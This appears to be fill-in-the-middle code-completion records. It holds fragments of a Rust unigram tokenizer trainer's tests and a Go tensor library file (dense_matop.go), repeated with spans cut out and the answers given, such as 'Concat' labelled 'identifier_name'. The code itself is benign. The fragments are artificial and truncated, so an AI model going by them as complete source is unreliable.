let mut map = HashMap::new();
for word in words {
map.entry(word).and_modify(|c| *c += 1).or_insert(1);
}
Ok(map)
})
.reduce(
|| Ok(HashMap::new()),
|acc, ws| {
let mut acc = acc?;
for (k, v) in ws? {
acc.entry(k).and_modify(|c| *c += v).or_insert(v);
}
Ok(acc)
},
);
self.words = words?;
Ok(())
}
}
#[cfg(test)]
mod tests {
use super::*;
use assert_approx_eq::assert_approx_eq;
use std::iter::FromIterator;
#[test]
fn test_unigram_chars() {
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.build()
.unwrap();
let sentences = vec![
("This is a".to_string(), 1),
("こんにちは友達".to_string(), 1),
];
let required_chars = trainer.required_chars(&sentences);
assert_eq!(required_chars.len(), 13);
let progress = None;
let table = trainer.make_seed_sentence_pieces(&sentences, &progress);
let target_strings = vec![
"s", "i", " ", "達", "友", "ん", "は", "に", "ち", "こ", "h", "a", "T", "is ", "s ",
];
let strings: Vec<_> = table.iter().map(|(string, _)| string).collect();
assert_eq!(strings, target_strings);
let scores = table.iter().map(|(_, score)| score);
let target_scores = vec![
-2.5649493574615367, // 2.0
-2.5649493574615367, // 2.0
-2.5649493574615367, // 2.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-3.258096538021482, // 1.0
-1.4663370687934272, // 6.0
-1.8718021769015916, // 4.0
];
for (score, target_score) in scores.zip(target_scores) {
assert_approx_eq!(*score, target_score, 0.01);
}
}
#[test]
fn test_initial_alphabet() {
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.initial_alphabet(HashSet::from_iter(vec!['a', 'b', 'c', 'd', 'e', 'f']))
.build()
.unwrap();
let sentences = vec![("こんにちは友達".to_string(), 1)];
let required_chars = trainer.required_chars(&sentences);
assert_eq!(
required_chars,
vec!["こ", "ん", "に", "ち", "は", "友", "達", "a", "b", "c", "d", "e", "f"]
.into_iter()
.map(|s| s.to_owned())
.collect::<HashSet<_>>()
);
}
#[test]
fn test_unk_token() {
// 1. Should add `unk_token` as first special token
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.special_tokens(vec![
AddedToken::from("[SEP]", true),
AddedToken::from("[CLS]", true),
])
.unk_token(Some("[UNK]".into()))
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next(), Some(&("[UNK]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
// 2. Let it where it is
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.special_tokens(vec![
AddedToken::from("[SEP]", true),
AddedToken::from("[CLS]", true),
AddedToken::from("[UNK]", true),
])
.unk_token(Some("[UNK]".into()))
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[UNK]".into(), 0.0)));
// 3. Don't put it there if not needed
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next().unwrap().0, "e".to_string());
}
#[test]
fn test_special_tokens() {
let trainer = UnigramTrainerBuilder::default()
.show_progress(false)
.special_tokens(vec![
AddedToken::from("[SEP]", true),
AddedToken::from("[CLS]", true),
])
.build()
.unwrap();
let mut unigram = Unigram::default();
trainer
.do_train(vec![("The".into(), 12), ("are".into(), 11)], &mut unigram)
.unwrap();
let mut pieces = unigram.iter();
assert_eq!(pieces.next(), Some(&("[SEP]".into(), 0.0)));
assert_eq!(pieces.next(), Some(&("[CLS]".into(), 0.0)));
}
#[test]
fn test_to_log_prob() {
let mut a = vec![("".to_string(), 1.0), ("".to_string(), 2.0)];
to_log_prob(&mut a);
let scores = a.iter().map(|(_, score)| *score).collect::<Vec<_>>();
// ln(1) - ln(3)
assert_approx_eq!(scores[0], -1.098, 0.01);
// ln(2) - ln(3)
assert_approx_eq!(scores[1], -0.405, 0.01);
}
}
| {
// new_pieces.push((token.to_string(), *score));
continue;
} | conditional_block |
dense_matop.go | package tensor
import (
"github.com/pkg/errors"
"reflect"
)
// Apply applies a function to all the values in the ndarray
func (t *Dense) Apply(fn interface{}, opts ...FuncOpt) (retVal Tensor, err error) {
fo := parseFuncOpts(opts...)
reuseT, incr := fo.incrReuse()
safe := fo.safe()
var reuse *Dense
if reuse, err = getDense(reuseT); err != nil {
return
}
// check reuse and stuff
var res *Dense
switch {
case reuse != nil:
res = reuse
if res.len() != t.Size() {
err = errors.Errorf(shapeMismatch, t.Shape(), reuse.Shape())
return
}
case !safe:
res = t
default:
if t.IsMaterializable() {
res = t.Materialize().(*Dense)
} else {
res = t.Clone().(*Dense)
}
}
// do
switch {
case t.viewOf == nil:
err = res.mapFn(fn, incr)
case t.viewOf != nil:
it := IteratorFromDense(t)
if err = res.iterMap(fn, it, incr); err != nil {
return
}
default:
err = errors.Errorf("Apply not implemented for this state: isView: %t and incr: %t", t.viewOf == nil, incr)
return
}
// set retVal
switch {
case reuse != nil:
if err = reuseCheckShape(reuse, t.Shape()); err != nil {
return
}
retVal = reuse
case !safe:
retVal = t
default:
retVal = res
// retVal = New(Of(t.t), WithBacking(res), WithShape(t.Shape()...))
}
return
}
// T performs a thunked transpose. It doesn't actually do anything, except store extra information about the post-transposed shapes and strides
// Usually this is more than enough, as BLAS will handle the rest of the transpose
func (t *Dense) T(axes ...int) (err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
return handleNoOp(err)
}
// is there any old transposes that need to be done first?
// this is important, because any old transposes for dim >=3 are merely permutations of the strides
if t.old != nil {
if t.IsVector() {
// the transform that was calculated was a waste of time - return it to the pool then untranspose
ReturnAP(transform)
t.UT()
return
}
// check if the current axes are just a reverse of the previous transpose's
isReversed := true
for i, s := range t.oshape() {
if transform.Shape()[i] != s {
isReversed = false
break
}
}
// if it is reversed, well, we just restore the backed up one
if isReversed {
ReturnAP(transform)
t.UT()
return
}
// cool beans. No funny reversals. We'd have to actually do transpose then
t.Transpose()
}
// swap out the old and the new
t.old = t.AP
t.transposeWith = axes
t.AP = transform
return nil
}
// UT is a quick way to untranspose a currently transposed *Dense
// The reason for having this is quite simply illustrated by this problem:
// T = NewTensor(WithShape(2,3,4))
// T.T(1,2,0)
//
// To untranspose that, we'd need to apply a transpose of (2,0,1).
// This means having to keep track and calculate the transposes.
// Instead, here's a helpful convenience function to instantly untranspose any previous transposes.
//
// Nothing will happen if there was no previous transpose
func (t *Dense) UT() {
if t.old != nil {
ReturnAP(t.AP)
ReturnInts(t.transposeWith)
t.AP = t.old
t.old = nil
t.transposeWith = nil
}
}
// SafeT is exactly like T(), except it returns a new *Dense. The data is also copied over, unmoved.
func (t *Dense) SafeT(axes ...int) (retVal *Dense, err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
if err = handleNoOp(err); err != nil {
return
}
}
retVal = recycledDense(t.t, Shape{t.len()})
copyDense(retVal, t)
retVal.AP = transform
retVal.old = t.AP.Clone()
retVal.transposeWith = axes
return
}
// Transpose() actually transposes the data.
// This is a generalized version of the inplace matrix transposition algorithm from Wikipedia:
// https://en.wikipedia.org/wiki/In-place_matrix_transposition
func (t *Dense) Transpose() {
// if there is no oldinfo, that means the current info is the latest, and not the transpose
if t.old == nil {
return
}
if t.IsScalar() {
return // cannot transpose scalars
}
defer func() {
ReturnAP(t.old)
t.old = nil
t.transposeWith = nil
}()
expShape := t.Shape()
expStrides := expShape.calcStrides() // important! because the strides would have changed once the underlying data changed
defer ReturnInts(expStrides)
defer func() {
t.setShape(expShape...)
t.sanity()
}()
if t.IsVector() {
// no change of strides.
return
}
t.transpose(expStrides)
}
// At returns the value at the given coordinate
func (t *Dense) At(coords ...int) (interface{}, error) {
if len(coords) != t.Dims() {
return nil, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return nil, errors.Wrap(err, "At()")
}
return t.Get(at), nil
}
// MaskAt returns the value of the mask at a given coordinate
// returns false (valid) if not tensor is not masked
func (t *Dense) MaskAt(coords ...int) (bool, error) {
if !t.IsMasked() {
return false, nil
}
if len(coords) != t.Dims() {
return true, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return true, errors.Wrap(err, "MaskAt()")
}
return t.mask[at], nil
}
// SetAt sets the value at the given coordinate
func (t *Dense) SetAt(v interface{}, coords ...int) error {
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.Set(at, v)
return nil
}
// SetMaskAtDataIndex set the value of the mask at a given index
func (t *Dense) SetMaskAtIndex(v bool, i int) error {
if !t.IsMasked() {
return nil
}
t.mask[i] = v
return nil
}
// SetMaskAt sets the mask value at the given coordinate
func (t *Dense) SetMaskAt(v bool, coords ...int) error {
if !t.IsMasked() {
return nil
}
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.mask[at] = v
return nil
}
// Repeat is like Numpy's repeat. It repeats the elements of an array.
// The repeats param defines how many times each element in the axis is repeated.
// Just like NumPy, the repeats param is broadcasted to fit the size of the given axis.
func (t *Dense) Repeat(axis int, repeats ...int) (retVal Tensor, err error) {
var newShape Shape
var size int
if newShape, repeats, size, err = t.Shape().Repeat(axis, repeats...); err != nil {
return nil, errors.Wrap(err, "Unable to get repeated shape")
}
if axis == AllAxes {
axis = 0
}
d := recycledDense(t.t, newShape)
// d := New(Of(t.t), WithShape(newShape...))
var outers int
if t.IsScalar() {
outers = 1
} else {
outers = ProdInts(t.Shape()[0:axis])
if outers == 0 {
outers = 1
}
}
var stride, newStride int
if newShape.IsVector() || t.IsVector() {
stride = 1 // special case because CalcStrides() will return []int{1} as the strides for a vector
} else {
stride = t.ostrides()[axis]
}
if newShape.IsVector() {
newStride = 1
} else {
newStride = d.ostrides()[axis]
}
var destStart, srcStart int
for i := 0; i < outers; i++ {
for j := 0; j < size; j++ {
var tmp int
tmp = repeats[j]
for k := 0; k < tmp; k++ {
if srcStart >= t.len() || destStart+stride > d.len() {
break
}
copySliced(d, destStart, d.len(), t, srcStart, t.len())
destStart += newStride
}
srcStart += stride
}
}
return d, nil
}
// CopyTo copies the underlying data to the destination *Dense. The original data is untouched.
// Note: CopyTo doesn't care about the metadata of the destination *Dense. Take for example:
// T = NewTensor(WithShape(6))
// T2 = NewTensor(WithShape(2,3))
// err = T.CopyTo(T2) // err == nil
//
// The only time that this will fail is if the underlying sizes are different
func (t *Dense) CopyTo(other *Dense) error {
if other == t {
return nil // nothing to copy to. Maybe return NoOpErr?
}
if other.Size() != t.Size() {
return errors.Errorf(sizeMismatch, t.Size(), other.Size())
}
// easy peasy lemon squeezy
if t.viewOf == nil && other.viewOf == nil {
copyDense(other, t)
return nil
}
return errors.Errorf(methodNYI, "CopyTo", "views")
}
// Slice performs slicing on the *Dense Tensor. It returns a view which shares the same underlying memory as the original *Dense.
//
// Given:
// T = NewTensor(WithShape(2,2), WithBacking(RangeFloat64(0,4)))
// V, _ := T.Slice(nil, singleSlice(1)) // T[:, 1]
//
// Any modification to the values in V, will be reflected in T as well.
//
// The method treats <nil> as equivalent to a colon slice. T.Slice(nil) is equivalent to T[:] in Numpy syntax
func (t *Dense) Slice(slices ...Slice) (retVal Tensor, err error) {
var newAP *AP
var ndStart, ndEnd int
if newAP, ndStart, ndEnd, err = t.AP.S(t.len(), slices...); err != nil {
return
}
view := new(Dense)
view.t = t.t
view.viewOf = t
view.AP = newAP
view.hdr = new(reflect.SliceHeader)
view.data = t.data
view.hdr.Data = t.hdr.Data
view.hdr.Len = t.hdr.Len
view.hdr.Cap = t.hdr.Cap
view.slice(ndStart, ndEnd)
if t.IsMasked() {
view.mask = t.mask[ndStart:ndEnd]
}
return view, err
}
// RollAxis rolls the axis backwards until it lies in the given position.
//
// This method was adapted from Numpy's Rollaxis. The licence for Numpy is a BSD-like licence and can be found here: https://github.com/numpy/numpy/blob/master/LICENSE.txt
//
// As a result of being adapted from Numpy, the quirks are also adapted. A good guide reducing the confusion around rollaxis can be found here: http://stackoverflow.com/questions/29891583/reason-why-numpy-rollaxis-is-so-confusing (see answer by hpaulj)
func (t *Dense) RollAxis(axis, start int, safe bool) (retVal *Dense, err error) {
dims := t.Dims()
if !(axis >= 0 && axis < dims) {
err = errors.Errorf(invalidAxis, axis, dims)
return
}
if !(start >= 0 && start <= dims) {
err = errors.Wrap(errors.Errorf(invalidAxis, axis, dims), "Start axis is wrong")
return
}
if axis < start {
start--
}
if axis == start {
retVal = t
return
}
axes := BorrowInts(dims)
defer ReturnInts(axes)
for i := 0; i < dims; i++ {
axes[i] = i
}
copy(axes[axis:], axes[axis+1:])
copy(axes[start+1:], axes[start:])
axes[start] = axis
if safe {
return t.SafeT(axes...)
}
err = t.T(axes...)
retVal = t
return
}
// Concat concatenates the other tensors along the given axis. It is like Numpy's concatenate() function.
func (t *Dense) | (axis int, Ts ...*Dense) (retVal *Dense, err error) {
ss := make([]Shape, len(Ts))
var isMasked = false
for i, T := range Ts {
ss[i] = T.Shape()
isMasked = isMasked || T.IsMasked()
}
var newShape Shape
if newShape, err = t.Shape().Concat(axis, ss...); err != nil {
return
}
retVal = recycledDense(t.t, newShape)
if isMasked {
retVal.makeMask()
}
all := make([]*Dense, len(Ts)+1)
all[0] = t
copy(all[1:], Ts)
// special case
var start, end int
for _, T := range all {
end += T.Shape()[axis]
slices := make([]Slice, axis+1)
slices[axis] = makeRS(start, end)
var v *Dense
if v, err = sliceDense(retVal, slices...); err != nil {
return
}
if v.IsVector() && T.IsMatrix() && axis == 0 {
v.reshape(v.shape[0], 1)
}
if err = assignArray(v, T); err != nil {
return
}
start = end
}
return
}
// Hstack stacks other tensors columnwise (horizontal stacking)
func (t *Dense) Hstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 1D
if t.Dims() == 0 {
return nil, errors.Errorf(atleastDims, 1)
}
for _, d := range others {
if d.Dims() < 1 {
return nil, errors.Errorf(atleastDims, 1)
}
}
if t.Dims() == 1 {
return t.Concat(0, others...)
}
return t.Concat(1, others...)
}
// Vstack stacks other tensors rowwise (vertical stacking). Vertical stacking requires all involved Tensors to have at least 2 dimensions
func (t *Dense) Vstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 2D
if t.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
for _, d := range others {
if d.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
}
return t.Concat(0, others...)
}
// Stack stacks the other tensors along the axis specified. It is like Numpy's stack function.
func (t *Dense) Stack(axis int, others ...*Dense) (retVal *Dense, err error) {
opdims := t.Dims()
if axis >= opdims+1 {
err = errors.Errorf(dimMismatch, opdims+1, axis)
return
}
newShape := Shape(BorrowInts(opdims + 1))
newShape[axis] = len(others) + 1
shape := t.Shape()
var cur int
for i, s := range shape {
if i == axis {
cur++
}
newShape[cur] = s
cur++
}
newStrides := newShape.calcStrides()
ap := NewAP(newShape, newStrides)
allNoMat := !t.IsMaterializable()
for _, ot := range others {
if allNoMat && ot.IsMaterializable() {
allNoMat = false
}
}
retVal = recycledDense(t.t, ap.Shape())
ReturnAP(retVal.AP)
retVal.AP = ap
// the "viewStack" method is the more generalized method
// and will work for all Tensors, regardless of whether it's a view
// But the simpleStack is faster, and is an optimization
if allNoMat {
retVal = t.simpleStack(retVal, axis, others...)
} else {
retVal = t.viewStack(retVal, axis, others...)
}
return
}
/* Private Methods */
// returns the new index given the old index
func (t *Dense) transposeIndex(i int, transposePat, strides []int) int {
oldCoord, err := Itol(i, t.oshape(), t.ostrides())
if err != nil {
panic(err)
}
/*
coordss, _ := Permute(transposePat, oldCoord)
coords := coordss[0]
expShape := t.Shape()
index, _ := Ltoi(expShape, strides, coords...)
*/
// The above is the "conceptual" algorithm.
// Too many checks above slows things down, so the below is the "optimized" edition
var index int
for i, axis := range transposePat {
index += oldCoord[axis] * strides[i]
}
return index
}
// at returns the index at which the coordinate is referring to.
// This function encapsulates the addressing of elements in a contiguous block.
// For a 2D ndarray, ndarray.at(i,j) is
// at = ndarray.strides[0]*i + ndarray.strides[1]*j
// This is of course, extensible to any number of dimensions.
func (t *Dense) at(coords ...int) (at int, err error) {
return Ltoi(t.Shape(), t.Strides(), coords...)
}
// maskat returns the mask index at which the coordinate is referring to.
func (t *Dense) maskAt(coords ...int) (at int, err error) {
//TODO: Add check for non-masked tensor
return t.at(coords...)
}
// simpleStack is the data movement function for non-view tensors. What it does is simply copy the data according to the new strides
func (t *Dense) simpleStack(retVal *Dense, axis int, others ...*Dense) *Dense {
switch axis {
case 0:
copyDense(retVal, t)
next := t.len()
for _, ot := range others {
copySliced(retVal, next, retVal.len(), ot, 0, ot.len())
next += ot.len()
}
default:
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
destStart := 0
start := 0
end := start + axisStride
for i := 0; i < batches; i++ {
copySliced(retVal, destStart, retVal.len(), t, start, end)
for _, ot := range others {
destStart += axisStride
copySliced(retVal, destStart, retVal.len(), ot, start, end)
i++
}
destStart += axisStride
start += axisStride
end += axisStride
}
}
return retVal
}
// viewStack is the data movement function for Stack(), applied on views
func (t *Dense) viewStack(retVal *Dense, axis int, others ...*Dense) *Dense {
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
it := NewFlatIterator(t.AP)
ch := it.Chan()
chs := make([]chan int, len(others))
chs = chs[:0]
for _, ot := range others {
oter := NewFlatIterator(ot.AP)
chs = append(chs, oter.Chan())
}
t.doViewStack(retVal, axisStride, batches, ch, others, chs)
return retVal
}
| Concat | identifier_name |
dense_matop.go | package tensor
import (
"github.com/pkg/errors"
"reflect"
)
// Apply applies a function to all the values in the ndarray
func (t *Dense) Apply(fn interface{}, opts ...FuncOpt) (retVal Tensor, err error) {
fo := parseFuncOpts(opts...)
reuseT, incr := fo.incrReuse()
safe := fo.safe()
var reuse *Dense
if reuse, err = getDense(reuseT); err != nil {
return
}
// check reuse and stuff
var res *Dense
switch {
case reuse != nil:
res = reuse
if res.len() != t.Size() {
err = errors.Errorf(shapeMismatch, t.Shape(), reuse.Shape())
return
}
case !safe:
res = t
default:
if t.IsMaterializable() {
res = t.Materialize().(*Dense)
} else {
res = t.Clone().(*Dense)
}
}
// do
switch {
case t.viewOf == nil:
err = res.mapFn(fn, incr)
case t.viewOf != nil:
it := IteratorFromDense(t)
if err = res.iterMap(fn, it, incr); err != nil {
return
}
default:
err = errors.Errorf("Apply not implemented for this state: isView: %t and incr: %t", t.viewOf == nil, incr)
return
}
// set retVal
switch {
case reuse != nil:
if err = reuseCheckShape(reuse, t.Shape()); err != nil {
return
}
retVal = reuse
case !safe:
retVal = t
default:
retVal = res
// retVal = New(Of(t.t), WithBacking(res), WithShape(t.Shape()...))
}
return
}
// T performs a thunked transpose. It doesn't actually do anything, except store extra information about the post-transposed shapes and strides
// Usually this is more than enough, as BLAS will handle the rest of the transpose
func (t *Dense) T(axes ...int) (err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
return handleNoOp(err)
}
// is there any old transposes that need to be done first?
// this is important, because any old transposes for dim >=3 are merely permutations of the strides
if t.old != nil {
if t.IsVector() {
// the transform that was calculated was a waste of time - return it to the pool then untranspose
ReturnAP(transform)
t.UT()
return
}
// check if the current axes are just a reverse of the previous transpose's
isReversed := true
for i, s := range t.oshape() {
if transform.Shape()[i] != s {
isReversed = false
break
}
}
// if it is reversed, well, we just restore the backed up one
if isReversed {
ReturnAP(transform)
t.UT()
return
}
// cool beans. No funny reversals. We'd have to actually do transpose then
t.Transpose()
}
// swap out the old and the new
t.old = t.AP
t.transposeWith = axes
t.AP = transform
return nil
}
// UT is a quick way to untranspose a currently transposed *Dense
// The reason for having this is quite simply illustrated by this problem:
// T = NewTensor(WithShape(2,3,4))
// T.T(1,2,0)
//
// To untranspose that, we'd need to apply a transpose of (2,0,1).
// This means having to keep track and calculate the transposes.
// Instead, here's a helpful convenience function to instantly untranspose any previous transposes.
//
// Nothing will happen if there was no previous transpose
func (t *Dense) UT() {
if t.old != nil {
ReturnAP(t.AP)
ReturnInts(t.transposeWith)
t.AP = t.old
t.old = nil
t.transposeWith = nil
}
}
// SafeT is exactly like T(), except it returns a new *Dense. The data is also copied over, unmoved.
func (t *Dense) SafeT(axes ...int) (retVal *Dense, err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
if err = handleNoOp(err); err != nil {
return
}
}
retVal = recycledDense(t.t, Shape{t.len()})
copyDense(retVal, t)
retVal.AP = transform
retVal.old = t.AP.Clone()
retVal.transposeWith = axes
return
}
// Transpose() actually transposes the data.
// This is a generalized version of the inplace matrix transposition algorithm from Wikipedia:
// https://en.wikipedia.org/wiki/In-place_matrix_transposition
func (t *Dense) Transpose() {
// if there is no oldinfo, that means the current info is the latest, and not the transpose
if t.old == nil {
return
}
if t.IsScalar() {
return // cannot transpose scalars
}
defer func() {
ReturnAP(t.old)
t.old = nil
t.transposeWith = nil
}()
expShape := t.Shape()
expStrides := expShape.calcStrides() // important! because the strides would have changed once the underlying data changed
defer ReturnInts(expStrides)
defer func() {
t.setShape(expShape...)
t.sanity()
}()
if t.IsVector() {
// no change of strides.
return
}
t.transpose(expStrides)
}
// At returns the value at the given coordinate
func (t *Dense) At(coords ...int) (interface{}, error) {
if len(coords) != t.Dims() {
return nil, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return nil, errors.Wrap(err, "At()")
}
return t.Get(at), nil
}
// MaskAt returns the value of the mask at a given coordinate
// returns false (valid) if not tensor is not masked
func (t *Dense) MaskAt(coords ...int) (bool, error) {
if !t.IsMasked() {
return false, nil
}
if len(coords) != t.Dims() {
return true, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return true, errors.Wrap(err, "MaskAt()")
}
return t.mask[at], nil
}
// SetAt sets the value at the given coordinate
func (t *Dense) SetAt(v interface{}, coords ...int) error {
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.Set(at, v)
return nil
}
// SetMaskAtDataIndex set the value of the mask at a given index
func (t *Dense) SetMaskAtIndex(v bool, i int) error {
if !t.IsMasked() {
return nil
}
t.mask[i] = v
return nil
}
// SetMaskAt sets the mask value at the given coordinate
func (t *Dense) SetMaskAt(v bool, coords ...int) error {
if !t.IsMasked() {
return nil
}
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.mask[at] = v
return nil
}
// Repeat is like Numpy's repeat. It repeats the elements of an array.
// The repeats param defines how many times each element in the axis is repeated.
// Just like NumPy, the repeats param is broadcasted to fit the size of the given axis.
func (t *Dense) Repeat(axis int, repeats ...int) (retVal Tensor, err error) {
var newShape Shape
var size int
if newShape, repeats, size, err = t.Shape().Repeat(axis, repeats...); err != nil {
return nil, errors.Wrap(err, "Unable to get repeated shape")
}
if axis == AllAxes {
axis = 0
}
d := recycledDense(t.t, newShape)
// d := New(Of(t.t), WithShape(newShape...))
var outers int
if t.IsScalar() {
outers = 1
} else {
outers = ProdInts(t.Shape()[0:axis])
if outers == 0 {
outers = 1
}
}
var stride, newStride int
if newShape.IsVector() || t.IsVector() {
stride = 1 // special case because CalcStrides() will return []int{1} as the strides for a vector
} else {
stride = t.ostrides()[axis]
}
if newShape.IsVector() {
newStride = 1
} else {
newStride = d.ostrides()[axis]
}
var destStart, srcStart int
for i := 0; i < outers; i++ {
for j := 0; j < size; j++ {
var tmp int
tmp = repeats[j]
for k := 0; k < tmp; k++ {
if srcStart >= t.len() || destStart+stride > d.len() {
break
}
copySliced(d, destStart, d.len(), t, srcStart, t.len())
destStart += newStride
}
srcStart += stride
}
}
return d, nil
}
// CopyTo copies the underlying data to the destination *Dense. The original data is untouched.
// Note: CopyTo doesn't care about the metadata of the destination *Dense. Take for example:
// T = NewTensor(WithShape(6))
// T2 = NewTensor(WithShape(2,3))
// err = T.CopyTo(T2) // err == nil
//
// The only time that this will fail is if the underlying sizes are different
func (t *Dense) CopyTo(other *Dense) error {
if other == t {
return nil // nothing to copy to. Maybe return NoOpErr?
}
if other.Size() != t.Size() {
return errors.Errorf(sizeMismatch, t.Size(), other.Size())
}
// easy peasy lemon squeezy
if t.viewOf == nil && other.viewOf == nil {
copyDense(other, t)
return nil
}
return errors.Errorf(methodNYI, "CopyTo", "views")
}
// Slice performs slicing on the *Dense Tensor. It returns a view which shares the same underlying memory as the original *Dense.
//
// Given:
// T = NewTensor(WithShape(2,2), WithBacking(RangeFloat64(0,4)))
// V, _ := T.Slice(nil, singleSlice(1)) // T[:, 1]
//
// Any modification to the values in V, will be reflected in T as well.
//
// The method treats <nil> as equivalent to a colon slice. T.Slice(nil) is equivalent to T[:] in Numpy syntax
func (t *Dense) Slice(slices ...Slice) (retVal Tensor, err error) {
var newAP *AP
var ndStart, ndEnd int
if newAP, ndStart, ndEnd, err = t.AP.S(t.len(), slices...); err != nil {
return
}
view := new(Dense)
view.t = t.t
view.viewOf = t
view.AP = newAP
view.hdr = new(reflect.SliceHeader)
view.data = t.data
view.hdr.Data = t.hdr.Data
view.hdr.Len = t.hdr.Len
view.hdr.Cap = t.hdr.Cap
view.slice(ndStart, ndEnd)
if t.IsMasked() {
view.mask = t.mask[ndStart:ndEnd]
}
return view, err
}
// RollAxis rolls the axis backwards until it lies in the given position.
//
// This method was adapted from Numpy's Rollaxis. The licence for Numpy is a BSD-like licence and can be found here: https://github.com/numpy/numpy/blob/master/LICENSE.txt
//
// As a result of being adapted from Numpy, the quirks are also adapted. A good guide reducing the confusion around rollaxis can be found here: http://stackoverflow.com/questions/29891583/reason-why-numpy-rollaxis-is-so-confusing (see answer by hpaulj)
func (t *Dense) RollAxis(axis, start int, safe bool) (retVal *Dense, err error) {
dims := t.Dims()
if !(axis >= 0 && axis < dims) {
err = errors.Errorf(invalidAxis, axis, dims)
return
}
if !(start >= 0 && start <= dims) {
err = errors.Wrap(errors.Errorf(invalidAxis, axis, dims), "Start axis is wrong")
return
}
if axis < start {
start--
}
if axis == start {
retVal = t
return
}
axes := BorrowInts(dims)
defer ReturnInts(axes)
for i := 0; i < dims; i++ {
axes[i] = i
}
copy(axes[axis:], axes[axis+1:])
copy(axes[start+1:], axes[start:])
axes[start] = axis
if safe {
return t.SafeT(axes...)
}
err = t.T(axes...)
retVal = t
return
}
// Concat concatenates the other tensors along the given axis. It is like Numpy's concatenate() function.
func (t *Dense) Concat(axis int, Ts ...*Dense) (retVal *Dense, err error) {
ss := make([]Shape, len(Ts))
var isMasked = false
for i, T := range Ts {
ss[i] = T.Shape()
isMasked = isMasked || T.IsMasked()
}
var newShape Shape
if newShape, err = t.Shape().Concat(axis, ss...); err != nil {
return
}
retVal = recycledDense(t.t, newShape)
if isMasked {
retVal.makeMask()
}
all := make([]*Dense, len(Ts)+1)
all[0] = t
copy(all[1:], Ts)
// special case
var start, end int
for _, T := range all {
end += T.Shape()[axis]
slices := make([]Slice, axis+1)
slices[axis] = makeRS(start, end)
var v *Dense
if v, err = sliceDense(retVal, slices...); err != nil {
return
}
if v.IsVector() && T.IsMatrix() && axis == 0 {
v.reshape(v.shape[0], 1)
}
if err = assignArray(v, T); err != nil {
return
}
start = end
}
return
}
// Hstack stacks other tensors columnwise (horizontal stacking)
func (t *Dense) Hstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 1D
if t.Dims() == 0 {
return nil, errors.Errorf(atleastDims, 1)
}
for _, d := range others {
if d.Dims() < 1 {
return nil, errors.Errorf(atleastDims, 1)
}
}
if t.Dims() == 1 {
return t.Concat(0, others...)
}
return t.Concat(1, others...)
}
// Vstack stacks other tensors rowwise (vertical stacking). Vertical stacking requires all involved Tensors to have at least 2 dimensions
func (t *Dense) Vstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 2D
if t.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
for _, d := range others {
if d.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
} |
// Stack stacks the other tensors along the axis specified. It is like Numpy's stack function.
func (t *Dense) Stack(axis int, others ...*Dense) (retVal *Dense, err error) {
opdims := t.Dims()
if axis >= opdims+1 {
err = errors.Errorf(dimMismatch, opdims+1, axis)
return
}
newShape := Shape(BorrowInts(opdims + 1))
newShape[axis] = len(others) + 1
shape := t.Shape()
var cur int
for i, s := range shape {
if i == axis {
cur++
}
newShape[cur] = s
cur++
}
newStrides := newShape.calcStrides()
ap := NewAP(newShape, newStrides)
allNoMat := !t.IsMaterializable()
for _, ot := range others {
if allNoMat && ot.IsMaterializable() {
allNoMat = false
}
}
retVal = recycledDense(t.t, ap.Shape())
ReturnAP(retVal.AP)
